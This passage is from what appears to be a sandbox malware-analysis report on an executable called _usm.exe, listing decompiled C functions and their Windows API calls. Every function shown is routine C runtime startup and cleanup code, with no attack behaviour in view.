      • Part of subcall function 001417EA: UnhandledExceptionFilter.KERNEL32(001461B8), ref: 00141A74
      • Part of subcall function 001417EA: GetCurrentProcess.KERNEL32(C0000409), ref: 00141A90
      • Part of subcall function 001417EA: TerminateProcess.KERNEL32(00000000), ref: 00141A97
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    C-Code - Quality: 96%
    			E00142407(void* __ecx) {
    				CHAR* _v8;
    				signed int _v12;
    				char _v16;
    				void* __edi;
    				intOrPtr* _t14;
    				signed int _t17;
    				char _t27;
    				void* _t28;
    				signed int _t37;
    				intOrPtr _t41;
    
    				_t26 = __ecx;
    				_t41 =  *0x14a8ac; // 0x1
    				if(_t41 == 0) {
    					E001443B1(__ecx);
    				}
    				 *0x14a5b4 = 0;
    				GetModuleFileNameA(0, 0x14a4b0, 0x104);
    				_t14 =  *0x14a8b8; // 0x2c1ed8
    				 *0x149e74 = 0x14a4b0;
    				if(_t14 == 0) {
    					L4:
    					_v8 = 0x14a4b0;
    					goto L5;
    				} else {
    					_v8 = _t14;
    					if( *_t14 != 0) {
    						L5:
    						E0014226D(_t26, _v8,  &_v16, 0, 0,  &_v12);
    						_t17 = _v12;
    						if(_t17 >= 0x3fffffff) {
    							L10:
    							return _t17 | 0xffffffff;
    						}
    						_t27 = _v16;
    						if(_t27 >= 0xffffffff) {
    							goto L10;
    						}
    						_t33 = _t17 << 2;
    						_t17 = (_t17 << 2) + _t27;
    						if(_t17 < _t27) {
    							goto L10;
    						}
    						_t17 = E00144468(_t17);
    						_t37 = _t17;
    						_pop(_t28);
    						if(_t37 == 0) {
    							goto L10;
    						}
    						E0014226D(_t28, _v8,  &_v16, _t37, _t33 + _t37,  &_v12);
    						 *0x149e58 = _v12 - 1;
    						 *0x149e5c = _t37;
    						return 0;
    					}
    					goto L4;
    				}
    			}
    APIs
    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe,00000104), ref: 00142433
    • _parse_cmdline.LIBCMT ref: 0014245E
      • Part of subcall function 00144468: Sleep.KERNEL32(00000000,00000001,?,?,00143061,00000018,00147C50,0000000C,001430F1,?,?,?,001428B7,0000000D,?,00141E3B), ref: 00144489
    • _parse_cmdline.LIBCMT ref: 0014249F
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    C-Code - Quality: 100%
    			E00141AEF(intOrPtr _a4) {
    				struct HINSTANCE__* _t2;
    
    				_t2 = GetModuleHandleW(L"mscoree.dll");
    				if(_t2 != 0) {
    					_t2 = GetProcAddress(_t2, "CorExitProcess");
    					if(_t2 != 0) {
    						return _t2->i(_a4);
    					}
    				}
    				return _t2;
    			}
    APIs
    • GetModuleHandleW.KERNEL32(mscoree.dll,?,00141B27,?,?,001451D9,000000FF,0000001E,00000001,00000000,00000000,?,00144479,?,00000001,?), ref: 00141AF9
    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,00141B27,?,?,001451D9,000000FF,0000001E,00000001,00000000,00000000,?,00144479,?,00000001), ref: 00141B09
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    C-Code - Quality: 91%
    			E0014402E(void* __ecx, void* __edx, void* __eflags, int _a4, int _a8) {
    				signed int _v8;
    				char _v21;
    				char _v22;
    				struct _cpinfo _v28;
    				signed int _v32;
    				int _v36;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t53;
    				int _t56;
    				signed char _t59;
    				int _t61;
    				short* _t62;
    				signed int _t66;
    				signed char* _t78;
    				signed int _t81;
    				int _t82;
    				signed int _t85;
    				intOrPtr* _t86;
    				int _t91;
    				signed char _t92;
    				signed int _t93;
    				int _t95;
    				int _t97;
    				signed int _t98;
    				signed int _t101;
    				intOrPtr* _t104;
    				signed int _t105;
    
    				_t53 =  *0x149004; // 0x20251455
    				_v8 = _t53 ^ _t105;
    				_t82 = _a8;
    				_t97 = E00143FB2(_a4);
    				_t100 = 0;
    				_a4 = _t97;
    				if(_t97 != 0) {
    					_v32 = 0;
    					_t56 = 0;
    					__eflags = 0;
    					while(1) {
    						__eflags =  *((intOrPtr*)(_t56 + 0x149750)) - _t97;
    						if( *((intOrPtr*)(_t56 + 0x149750)) == _t97) {
    							break;
    						}
    						_v32 = _v32 + 1;
    						_t56 = _t56 + 0x30;
    						__eflags = _t56 - 0xf0;
    						if(_t56 < 0xf0) {
    							continue;
    						} else {
    							__eflags = _t97 - 0xfde8;
    							if(_t97 == 0xfde8) {
    								L35:
    								_t64 = _t56 | 0xffffffff;
    								__eflags = _t56 | 0xffffffff;
    							} else {
    								__eflags = _t97 - 0xfde9;
    								if(_t97 == 0xfde9) {
    									goto L35;
    								} else {
    									_t56 = IsValidCodePage(_t97 & 0x0000ffff);
    									__eflags = _t56;
    									if(_t56 == 0) {
    										goto L35;
    									} else {
    										_t56 = GetCPInfo(_t97,  &_v28);
    										__eflags = _t56;
    										if(_t56 == 0) {
    											__eflags =  *0x14a758 - _t100; // 0x0
    											if(__eflags != 0) {
    												goto L1;
    											} else {
    												goto L35;
    											}
    										} else {
    											E00144DA0(_t82 + 0x1c, _t100, 0x101);
    											_t95 = 1;
    											 *(_t82 + 4) = _t97;
    											 *(_t82 + 0xc) = _t100;
    											__eflags = _v28 - 1;
    											if(_v28 <= 1) {
    												 *(_t82 + 8) = _t100;
    											} else {
    												__eflags = _v22;
    												if(_v22 != 0) {
    													_t104 =  &_v21;
    													while(1) {
    														_t92 =  *_t104;
    														__eflags = _t92;
    														if(_t92 == 0) {
    															goto L29;
    														}
    														_t81 =  *(_t104 - 1) & 0x000000ff;
    														_t93 = _t92 & 0x000000ff;
    														while(1) {
    															__eflags = _t81 - _t93;
    															if(_t81 > _t93) {
    																break;
    															}
    															 *(_t82 + _t81 + 0x1d) =  *(_t82 + _t81 + 0x1d) | 0x00000004;
    															_t81 = _t81 + 1;
    															__eflags = _t81;
    														}
    														_t104 = _t104 + 2;
    														__eflags =  *(_t104 - 1);
    														if( *(_t104 - 1) != 0) {
    															continue;
    														}
    														goto L29;
    													}
    												}
    												L29:
    												_t78 = _t82 + 0x1e;
    												_t91 = 0xfe;
    												do {
    													 *_t78 =  *_t78 | 0x00000008;
    													_t78 =  &(_t78[1]);
    													_t91 = _t91 - 1;
    													__eflags = _t91;
    												} while (_t91 != 0);
    												 *(_t82 + 0xc) = E00143CE8( *(_t82 + 4));
    												 *(_t82 + 8) = _t95;
    											}
    											_t97 = _t82 + 0x10;
    											asm("stosd");
    											asm("stosd");
    											asm("stosd");
    											L25:
    											_t100 = _t82;
    											E00143D7B(_t82);
    											goto L2;
    										}
    									}
    								}
    							}
    						}
    						goto L36;
    					}
    					E00144DA0(_t82 + 0x1c, _t100, 0x101);
    					_t85 = _v32 * 0x30;
    					_v36 = _t100;
    					_t101 = _t85 + 0x149760;
    					_v32 = _t101;
    					while(1) {
    						L21:
    						__eflags =  *_t101;
    						if( *_t101 == 0) {
    							break;
    						}
    						_t59 =  *(_t101 + 1);
    						__eflags = _t59;
    						if(_t59 != 0) {
    							_t98 =  *_t101 & 0x000000ff;
    							_t66 = _t59 & 0x000000ff;
    							while(1) {
    								__eflags = _t98 - _t66;
    								if(_t98 > _t66) {
    									break;
    								}
    								_t24 = _v36 + 0x14974c; // 0x14708800
    								 *(_t82 + _t98 + 0x1d) =  *(_t82 + _t98 + 0x1d) |  *_t24;
    								_t66 =  *(_t101 + 1) & 0x000000ff;
    								_t98 = _t98 + 1;
    								__eflags = _t98;
    							}
    							_t97 = _a4;
    							_t101 = _t101 + 2;
    							__eflags = _t101;
    							continue;
    						}
    						break;
    					}
    					_v36 = _v36 + 1;
    					_t101 = _v32 + 8;
    					__eflags = _v36 - 4;
    					_v32 = _t101;
    					if(_v36 < 4) {
    						goto L21;
    					}
    					 *(_t82 + 4) = _t97;
    					 *(_t82 + 8) = 1;
    					_t61 = E00143CE8(_t97);
    					 *(_t82 + 0xc) = _t61;
    					_t62 = _t82 + 0x10;
    					_t86 = _t85 + 0x149754;
    					_t95 = 6;
    					do {
    						 *_t62 =  *_t86;
    						_t86 = _t86 + 2;
    						_t62 = _t62 + 2;
    						_t95 = _t95 - 1;
    						__eflags = _t95;
    					} while (_t95 != 0);
    					goto L25;
    				} else {
    					L1:
    					E00143D17(_t82);
    					L2:
    					_t64 = 0;
    				}
    				L36:
    				return E001417EA(_t64, _t82, _v8 ^ _t105, _t95, _t97, _t100);
    			}
    APIs
      • Part of subcall function 00143FB2: GetOEMCP.KERNEL32(00000000,?), ref: 00143FDB
      • Part of subcall function 00143FB2: GetACP.KERNEL32(00000000,?), ref: 00143FFE
    • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000), ref: 001440A1
    • GetCPInfo.KERNEL32(00000000,?), ref: 001440B4
    • setSBUpLow.LIBCMT ref: 001441A2
      • Part of subcall function 00143D7B: GetCPInfo.KERNEL32(?,?,00000000,?), ref: 00143D9C
      • Part of subcall function 00143D7B: ___crtGetStringTypeA.LIBCMT ref: 00143E19
      • Part of subcall function 00143D7B: ___crtLCMapStringA.LIBCMT ref: 00143E39
      • Part of subcall function 00143D7B: ___crtLCMapStringA.LIBCMT ref: 00143E5E
    • setSBCS.LIBCMT ref: 0014405B
      • Part of subcall function 001417EA: IsDebuggerPresent.KERNEL32 ref: 00141A54
      • Part of subcall function 001417EA: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00141A69
      • Part of subcall function 001417EA: UnhandledExceptionFilter.KERNEL32(001461B8), ref: 00141A74
      • Part of subcall function 001417EA: GetCurrentProcess.KERNEL32(C0000409), ref: 00141A90
      • Part of subcall function 001417EA: TerminateProcess.KERNEL32(00000000), ref: 00141A97
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    C-Code - Quality: 79%
    			E00145083(void* __ecx, intOrPtr __edx, intOrPtr* _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
    				signed int _v8;
    				int _v12;
    				void* _v24;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t27;
    				intOrPtr _t33;
    				int _t37;
    				void* _t40;
    				short* _t41;
    				short* _t47;
    				intOrPtr _t48;
    				intOrPtr _t54;
    				int _t56;
    				intOrPtr _t57;
    				intOrPtr _t60;
    				signed int _t61;
    				short* _t62;
    
    				_t54 = __edx;
    				_push(__ecx);
    				_push(__ecx);
    				_t27 =  *0x149004; // 0x20251455
    				_v8 = _t27 ^ _t61;
    				_t47 = 0;
    				_v12 = 0;
    				if(_a24 == 0) {
    					_a24 =  *((intOrPtr*)( *_a4 + 4));
    				}
    				_t56 = MultiByteToWideChar(_a24, 1 + (0 | _a28 != _t47) * 8, _a12, _a16, _t47, _t47);
    				if(_t56 != _t47) {
    					if(__eflags > 0) {
    						__eflags = _t56 - 0x7ffffff0;
    						if(_t56 <= 0x7ffffff0) {
    							_t16 = _t56 + 8; // 0x8
    							_t40 = _t56 + _t16;
    							__eflags = _t40 - 0x400;
    							if(_t40 > 0x400) {
    								_t41 = E001451AA(_t54, _t56, MultiByteToWideChar, _t40);
    								__eflags = _t41 - _t47;
    								if(_t41 != _t47) {
    									 *_t41 = 0xdddd;
    									goto L11;
    								}
    							} else {
    								E00145AA0(_t40);
    								_t41 = _t62;
    								__eflags = _t41 - _t47;
    								if(_t41 != _t47) {
    									 *_t41 = 0xcccc;
    									L11:
    									_t41 =  &(_t41[4]);
    									__eflags = _t41;
    								}
    							}
    							_t47 = _t41;
    						}
    					}
    					__eflags = _t47;
    					if(_t47 == 0) {
    						goto L3;
    					} else {
    						E00144DA0(_t47, 0, _t56 + _t56);
    						_t37 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t47, _t56);
    						__eflags = _t37;
    						if(_t37 != 0) {
    							_v12 = GetStringTypeW(_a8, _t47, _t37, _a20);
    						}
    						E00144D71(_t47);
    						_t33 = _v12;
    					}
    				} else {
    					L3:
    					_t33 = 0;
    				}
    				_pop(_t57);
    				_pop(_t60);
    				_pop(_t48);
    				return E001417EA(_t33, _t48, _v8 ^ _t61, _t54, _t57, _t60);
    			}
    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,?,?,?,?,00145198,?,?,?), ref: 001450CD
      • Part of subcall function 001451AA: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00144479,?,00000001,?,?,00143061,00000018,00147C50,0000000C,001430F1), ref: 001451EF
    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00145137
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00145145
    • __freea.LIBCMT ref: 0014514F
      • Part of subcall function 001417EA: IsDebuggerPresent.KERNEL32 ref: 00141A54
      • Part of subcall function 001417EA: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00141A69
      • Part of subcall function 001417EA: UnhandledExceptionFilter.KERNEL32(001461B8), ref: 00141A74
      • Part of subcall function 001417EA: GetCurrentProcess.KERNEL32(C0000409), ref: 00141A90
      • Part of subcall function 001417EA: TerminateProcess.KERNEL32(00000000), ref: 00141A97
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    C-Code - Quality: 58%
    			E00142830() {
    				signed int _t3;
    				long _t4;
    				struct _CRITICAL_SECTION* _t5;
    				struct _CRITICAL_SECTION* _t14;
    				signed int* _t17;
    				struct _CRITICAL_SECTION** _t18;
    
    				_t3 =  *0x149050; // 0x3
    				if(_t3 != 0xffffffff) {
    					__imp__DecodePointer( *0x14a5c4, _t3);
    					 *_t3();
    					 *0x149050 =  *0x149050 | 0xffffffff;
    				}
    				_t4 =  *0x149054; // 0x7
    				if(_t4 != 0xffffffff) {
    					TlsFree(_t4);
    					 *0x149054 =  *0x149054 | 0xffffffff;
    				}
    				_t17 = 0x149060;
    				do {
    					_t14 =  *_t17;
    					if(_t14 != 0 && _t17[1] != 1) {
    						DeleteCriticalSection(_t14);
    						E001443CF(_t14);
    						 *_t17 =  *_t17 & 0x00000000;
    					}
    					_t17 =  &(_t17[2]);
    				} while (_t17 < 0x149180);
    				_t18 = 0x149060;
    				do {
    					_t5 =  *_t18;
    					if(_t5 != 0 && _t18[1] == 1) {
    						DeleteCriticalSection(_t5);
    					}
    					_t18 =  &(_t18[2]);
    				} while (_t18 < 0x149180);
    				return _t5;
    			}
    APIs
    • DecodePointer.KERNEL32(00000003,00142C59,?,001418AC), ref: 00142841
    • TlsFree.KERNEL32(00000007,00142C59,?,001418AC), ref: 0014285B
    • DeleteCriticalSection.KERNEL32(00000000,00000000,774FA0FD,?,00142C59,?,001418AC), ref: 00142FC3
      • Part of subcall function 001443CF: HeapFree.KERNEL32(00000000,00000000), ref: 001443E5
      • Part of subcall function 001443CF: GetLastError.KERNEL32(00000000,?,0014298B,00000000,?,00141E3B,00000003), ref: 001443F7
    • DeleteCriticalSection.KERNEL32(00000007,774FA0FD,?,00142C59,?,001418AC), ref: 00142FED
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    C-Code - Quality: 80%
    			E00143F0B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				signed int _t15;
    				LONG* _t21;
    				void* _t29;
    				void* _t31;
    				LONG* _t33;
    				void* _t34;
    				void* _t35;
    
    				_t35 = __eflags;
    				_t29 = __edx;
    				_t25 = __ebx;
    				_push(0xc);
    				_push(0x147cd0);
    				E00142C80(__ebx, __edi, __esi);
    				_t31 = E0014299A(__ebx, _t35);
    				_t15 =  *0x149aa0; // 0xfffffffe
    				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
    					E001430D6(_t25, _t31, 0xd);
    					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
    					_t33 =  *(_t31 + 0x68);
    					 *(_t34 - 0x1c) = _t33;
    					__eflags = _t33 -  *0x149748; // 0x12c16b0
    					if(__eflags != 0) {
    						__eflags = _t33;
    						if(__eflags != 0) {
    							__eflags = InterlockedDecrement(_t33);
    							if(__eflags == 0) {
    								__eflags = _t33 - 0x149320;
    								if(__eflags != 0) {
    									E001443CF(_t33);
    								}
    							}
    						}
    						_t21 =  *0x149748; // 0x12c16b0
    						 *(_t31 + 0x68) = _t21;
    						_t33 =  *0x149748; // 0x12c16b0
    						 *(_t34 - 0x1c) = _t33;
    						InterlockedIncrement(_t33);
    					}
    					 *(_t34 - 4) = 0xfffffffe;
    					E00143FA6();
    				} else {
    					_t33 =  *(_t31 + 0x68);
    				}
    				_t38 = _t33;
    				if(_t33 == 0) {
    					_push(0x20);
    					E00141DBC(_t29, _t38);
    				}
    				return E00142CC5(_t33);
    			}
    APIs
    • __getptd.LIBCMT ref: 00143F17
      • Part of subcall function 0014299A: __amsg_exit.LIBCMT ref: 001429AA
    • __amsg_exit.LIBCMT ref: 00143F37
      • Part of subcall function 001430D6: __amsg_exit.LIBCMT ref: 001430F8
      • Part of subcall function 001430D6: EnterCriticalSection.KERNEL32(?,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 00143100
    • InterlockedDecrement.KERNEL32(?), ref: 00143F64
      • Part of subcall function 001443CF: HeapFree.KERNEL32(00000000,00000000), ref: 001443E5
      • Part of subcall function 001443CF: GetLastError.KERNEL32(00000000,?,0014298B,00000000,?,00141E3B,00000003), ref: 001443F7
    • InterlockedIncrement.KERNEL32(012C16B0), ref: 00143F8F
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    C-Code - Quality: 59%
    			E00142921(void* __ebx, void* __edx) {
    				void* __edi;
    				void* __esi;
    				long _t3;
    				long* _t7;
    				void* _t8;
    				long _t11;
    				void* _t18;
    				long _t19;
    				long* _t20;
    
    				_t18 = __edx;
    				_t3 = GetLastError();
    				_push( *0x149050);
    				_t19 = _t3;
    				_t20 =  *((intOrPtr*)(E001427FC()))();
    				if(_t20 == 0) {
    					_t7 = E001444AD(1, 0x214);
    					_t20 = _t7;
    					if(_t20 != 0) {
    						__imp__DecodePointer( *0x14a5c0,  *0x149050, _t20);
    						_t8 =  *_t7();
    						_t23 = _t8;
    						if(_t8 == 0) {
    							E001443CF(_t20);
    							_t20 = 0;
    							__eflags = 0;
    						} else {
    							_push(0);
    							_push(_t20);
    							E0014286D(__ebx, _t18, _t19, _t20, _t23);
    							_t11 = GetCurrentThreadId();
    							_t20[1] = _t20[1] | 0xffffffff;
    							 *_t20 = _t11;
    						}
    					}
    				}
    				SetLastError(_t19);
    				return _t20;
    			}

    APIs
    • GetLastError.KERNEL32(00000000,?,00143544,00143BE6,?,00141E3B,00000003), ref: 00142925
      • Part of subcall function 001427FC: TlsGetValue.KERNEL32(?,00142938,?,00141E3B,00000003), ref: 00142805
      • Part of subcall function 001427FC: DecodePointer.KERNEL32(?,00141E3B,00000003), ref: 00142817
      • Part of subcall function 001427FC: TlsSetValue.KERNEL32(00000000,?,00141E3B,00000003), ref: 00142826
    • SetLastError.KERNEL32(00000000,?,00141E3B,00000003), ref: 0014298F
      • Part of subcall function 001444AD: Sleep.KERNEL32(00000000), ref: 001444D5
    • DecodePointer.KERNEL32(00000000,?,00141E3B,00000003), ref: 00142961
    • GetCurrentThreadId.KERNEL32(?,00141E3B,00000003), ref: 00142977
      • Part of subcall function 001443CF: HeapFree.KERNEL32(00000000,00000000), ref: 001443E5
      • Part of subcall function 001443CF: GetLastError.KERNEL32(00000000,?,0014298B,00000000,?,00141E3B,00000003), ref: 001443F7
      • Part of subcall function 0014286D: GetModuleHandleW.KERNEL32(KERNEL32.DLL,00147BE0,00000008,00142975,00000000,00000000,?,00141E3B,00000003), ref: 0014287E
      • Part of subcall function 0014286D: InterlockedIncrement.KERNEL32(00149320), ref: 001428BF
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    C-Code - Quality: 75%
    			E00142191(void* __ecx, intOrPtr* __edx, void* __edi, signed int* _a4, signed int _a8, intOrPtr* _a12) {
    				signed int _v8;
    				intOrPtr* _v20;
    				signed int _v24;
    				intOrPtr _v28;
    				signed int _t50;
    				void* _t51;
    				signed int _t53;
    				void* _t56;
    				signed int _t57;
    				void* _t58;
    				signed int* _t64;
    				intOrPtr _t65;
    				intOrPtr _t66;
    				intOrPtr* _t69;
    				void* _t81;
    				signed char _t83;
    				void* _t86;
    				intOrPtr* _t96;
    				unsigned int _t98;
    				intOrPtr* _t104;
    				signed int _t105;
    				void* _t107;
    				signed int _t108;
    				signed int _t110;
    				signed int _t113;
    				signed int _t115;
    				intOrPtr* _t116;
    				void* _t121;
    
    				_t107 = __edi;
    				_t104 = __edx;
    				if( *0x14a8ac == 0) {
    					_t50 = E001443B1(__ecx);
    				}
    				_t113 =  *0x149b20; // 0x0
    				_push(_t107);
    				_t108 = 0;
    				if(_t113 != 0) {
    					while(1) {
    						_t51 =  *_t113;
    						if(_t51 == 0) {
    							break;
    						}
    						if(_t51 != 0x3d) {
    							_t108 = _t108 + 1;
    						}
    						_t113 = _t113 + E00143800(_t113) + 1;
    					}
    					_t50 = E001444AD(_t108 + 1, 4);
    					_t110 = _t50;
    					 *0x149e64 = _t110;
    					if(_t110 == 0) {
    						goto L3;
    					} else {
    						_t115 =  *0x149b20; // 0x0
    						while( *_t115 != 0) {
    							_t3 = E00143800(_t115) + 1; // 0x1
    							_t81 = _t3;
    							if( *_t115 == 0x3d) {
    								L14:
    								_t115 = _t115 + _t81;
    								continue;
    							} else {
    								_t56 = E001444AD(_t81, 1);
    								_pop(_t95);
    								 *_t110 = _t56;
    								if(_t56 == 0) {
    									_t57 = E001443CF( *0x149e64);
    									 *0x149e64 =  *0x149e64 & 0x00000000;
    									_t53 = _t57 | 0xffffffff;
    									L17:
    									goto L18;
    								} else {
    									_t58 = E00144409(_t56, _t81, _t115);
    									_t121 = _t121 + 0xc;
    									if(_t58 != 0) {
    										_push(0);
    										_push(0);
    										_push(0);
    										_push(0);
    										_push(0);
    										E00143464();
    										asm("int3");
    										_t96 = _v20;
    										_push(_t81);
    										_push(_t115);
    										 *_t110 = 0;
    										_t116 = _t104;
    										_t105 = _v24;
    										 *_t96 = 1;
    										if(_v28 != 0) {
    											_a4 =  &(_a4[1]);
    											 *_a4 = _t105;
    										}
    										_v8 = 0;
    										do {
    											if( *_t116 != 0x22) {
    												 *_t110 =  *_t110 + 1;
    												if(_t105 != 0) {
    													 *_t105 =  *_t116;
    													_a8 = _t105 + 1;
    												}
    												_t83 =  *_t116;
    												_t116 = _t116 + 1;
    												if(E00143CD0(_t83 & 0x000000ff) != 0) {
    													 *_t110 =  *_t110 + 1;
    													if(_a8 != 0) {
    														_a8 = _a8 + 1;
    														 *_a8 =  *_t116;
    													}
    													_t116 = _t116 + 1;
    												}
    												_t105 = _a8;
    												_t96 = _a12;
    												if(_t83 == 0) {
    													_t116 = _t116 - 1;
    												} else {
    													goto L33;
    												}
    											} else {
    												_t83 = 0x22;
    												_t116 = _t116 + 1;
    												_v8 = 0 | _v8 == 0x00000000;
    												goto L33;
    											}
    											L38:
    											_v8 = _v8 & 0x00000000;
    											L39:
    											while( *_t116 != 0) {
    												while(1) {
    													_t65 =  *_t116;
    													if(_t65 != 0x20 && _t65 != 9) {
    														break;
    													}
    													_t116 = _t116 + 1;
    												}
    												if( *_t116 != 0) {
    													if(_a4 != 0) {
    														_a4 =  &(_a4[1]);
    														 *_a4 = _t105;
    													}
    													 *_t96 =  *_t96 + 1;
    													while(1) {
    														_t86 = 1;
    														_t98 = 0;
    														L50:
    														while( *_t116 == 0x5c) {
    															_t116 = _t116 + 1;
    															_t98 = _t98 + 1;
    														}
    														if( *_t116 == 0x22) {
    															if((_t98 & 0x00000001) == 0) {
    																if(_v8 == 0) {
    																	L56:
    																	_t86 = 0;
    																	_v8 = 0 | _v8 == 0x00000000;
    																} else {
    																	_t69 = _t116 + 1;
    																	if( *_t69 != 0x22) {
    																		goto L56;
    																	} else {
    																		_t116 = _t69;
    																	}
    																}
    															}
    															_t98 = _t98 >> 1;
    														}
    														if(_t98 != 0) {
    															do {
    																_t98 = _t98 - 1;
    																if(_t105 != 0) {
    																	 *_t105 = 0x5c;
    																	_t105 = _t105 + 1;
    																}
    																 *_t110 =  *_t110 + 1;
    															} while (_t98 != 0);
    															_a8 = _t105;
    														}
    														_t66 =  *_t116;
    														if(_t66 != 0 && (_v8 != 0 || _t66 != 0x20 && _t66 != 9)) {
    															if(_t86 != 0) {
    																_push(_t66);
    																if(_t105 == 0) {
    																	if(E00143CD0() != 0) {
    																		_t116 = _t116 + 1;
    																		 *_t110 =  *_t110 + 1;
    																	}
    																} else {
    																	if(E00143CD0() != 0) {
    																		_a8 = _a8 + 1;
    																		 *_a8 =  *_t116;
    																		_t116 = _t116 + 1;
    																		 *_t110 =  *_t110 + 1;
    																	}
    																	_a8 = _a8 + 1;
    																	 *_a8 =  *_t116;
    																}
    																 *_t110 =  *_t110 + 1;
    																_t105 = _a8;
    															}
    															_t116 = _t116 + 1;
    															_t86 = 1;
    															_t98 = 0;
    															goto L50;
    														}
    														if(_t105 != 0) {
    															 *_t105 = 0;
    															_t105 = _t105 + 1;
    															_a8 = _t105;
    														}
    														 *_t110 =  *_t110 + 1;
    														_t96 = _a12;
    														goto L39;
    													}
    												}
    												break;
    											}
    											_t64 = _a4;
    											if(_t64 != 0) {
    												 *_t64 =  *_t64 & 0x00000000;
    											}
    											 *_t96 =  *_t96 + 1;
    											return _t64;
    											goto L82;
    											L33:
    										} while (_v8 != 0 || _t83 != 0x20 && _t83 != 9);
    										if(_t105 != 0) {
    											 *((char*)(_t105 - 1)) = 0;
    										}
    										goto L38;
    									} else {
    										_t110 = _t110 + 4;
    										goto L14;
    									}
    								}
    							}
    							goto L82;
    						}
    						E001443CF( *0x149b20);
    						 *0x149b20 =  *0x149b20 & 0x00000000;
    						 *_t110 =  *_t110 & 0x00000000;
    						 *0x14a8a0 = 1;
    						_t53 = 0;
    						goto L17;
    					}
    				} else {
    					L3:
    					_t53 = _t50 | 0xffffffff;
    					L18:
    					return _t53;
    				}
    				L82:
    			}

    APIs
    • _strlen.LIBCMT ref: 001421BB
      • Part of subcall function 001444AD: Sleep.KERNEL32(00000000), ref: 001444D5
    • _strlen.LIBCMT ref: 001421EC
      • Part of subcall function 001443CF: HeapFree.KERNEL32(00000000,00000000), ref: 001443E5
      • Part of subcall function 001443CF: GetLastError.KERNEL32(00000000,?,0014298B,00000000,?,00141E3B,00000003), ref: 001443F7
